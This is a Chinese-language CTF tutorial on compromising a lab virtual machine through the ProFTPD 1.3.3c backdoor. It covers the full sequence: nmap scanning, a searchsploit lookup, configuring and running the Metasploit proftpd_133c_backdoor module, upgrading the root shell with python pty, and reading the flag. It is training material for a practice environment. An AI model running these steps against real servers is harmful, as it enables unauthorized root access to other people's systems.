CTF入门之FTP服务后门渗透主机

admin 2022年8月28日08:22:39评论26 views字数 1351阅读4分30秒阅读模式

欢迎回来,我的新手黑客


今天依然没有故事也没有酒,今天给大家带来的是关于CTF方面的FTP服务后门,当然这个漏洞也有点历史了,不过我依然选择用文字把它记录下来,方便以后查阅,以及给有需要的人练手,提高操作能力




环境搭建:下载对应的镜像,使Kali和靶机处于同一个网段可以ping通

镜像下载地址:https://pan.baidu.com/s/17jAZss0rPKoEOXiv7mtQng

提取码:9wfv




Step1:和之前一篇CTF文章一样,还是先进行内网扫描,对于一个陌生的网络环境,只有通过扫描有助于我们找到目标,并探测出关于目标的更多消息

nmap -Pn -T4 192.168.83.0/24

CTF入门之FTP服务后门渗透主机

现在找到我们的目标,从输出信息中看出,我们的目标主机IP地址为192.168.83.133,该主机上开放了以下端口:21,22,80;从该输出信息中可以联想到的突破口可能有:21号端口上面的FTP服务是否存在漏洞,22号端口上面的SSH服务是否存在私钥泄露,还有80端口运行的http服务有没有存在漏洞

通过上面的扫描结果,我们现在只可以联想到上述的几个点,接下来我们来验证




Step2:进行更进一步的探测,我们需要获取对应服务的版本信息

nmap -sV -T4 192.168.83.133

CTF入门之FTP服务后门渗透主机

通过图片可以得知对应服务对应的版本信息,我们先来验证第一个想法---21号端口上面的FTP服务是否存在漏洞




Step3:可以得知FTP服务是通过ProFTPD 1.3.3c搭建的,接下来我们使用工具查找对应版本的漏洞,看看会不会发现什么

searchsploit ProFTPD 1.3.3c

CTF入门之FTP服务后门渗透主机

很好,通过工具的查找有发现相应的漏洞,事情正在往好的方向发展
看到这个.rb的文件就想到了两个东西,一个是.rb是通过Ruby语言写的,还有一个就是msfconsole



Step4:打开msfconsole搜索相对应的模块,如果有的话就更加的方便使用
msfconsolesearch ProFTPD 1.3.3c

CTF入门之FTP服务后门渗透主机

搜索出这么多的模块信息,找到相对应的版本,我们发现是4号攻击模块
接下来使用相对应的模块,并查看攻击模块信息和需要配置的参数信息
use exploit/unix/ftp/proftpd_133c_backdoorinfoshow options

CTF入门之FTP服务后门渗透主机

CTF入门之FTP服务后门渗透主机

我们发现需要配置的只有一个参数RHOSTS,该参数标识目标的位置信息,即IP地址
接下来就对该参数进行配置,准备开始渗透
set RHOSTS 192.168.83.133

CTF入门之FTP服务后门渗透主机

配置完查看是否配置成功



Step5:确认配置成功之后,对目标进行渗透攻击
exploit

CTF入门之FTP服务后门渗透主机


从上述图片中可以看到返回了一个shell会话,我们查看一下id信息

CTF入门之FTP服务后门渗透主机

发现竟然是root用户,这就利于我们后面查看flag,但是现在的终端没有了提示符信息,我们需要将他进行优化
python -c "import pty;pty.spawn('/bin/bash')"

CTF入门之FTP服务后门渗透主机


接下来查找flag,切换目录到root家目录下面查看文件信息

CTF入门之FTP服务后门渗透主机

到这里就拿到flag
同时证明我们的第一个假设成立,可以渗透主机获取root权限,那么后面两个想法就不展开验证



如果你支持我的文章,点一下右下角的“再看”,谢谢你啦

原文始发于微信公众号(Kali渗透测试教程):CTF入门之FTP服务后门渗透主机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日08:22:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CTF入门之FTP服务后门渗透主机https://cn-sec.com/archives/972054.html

发表评论

匿名网友 填写信息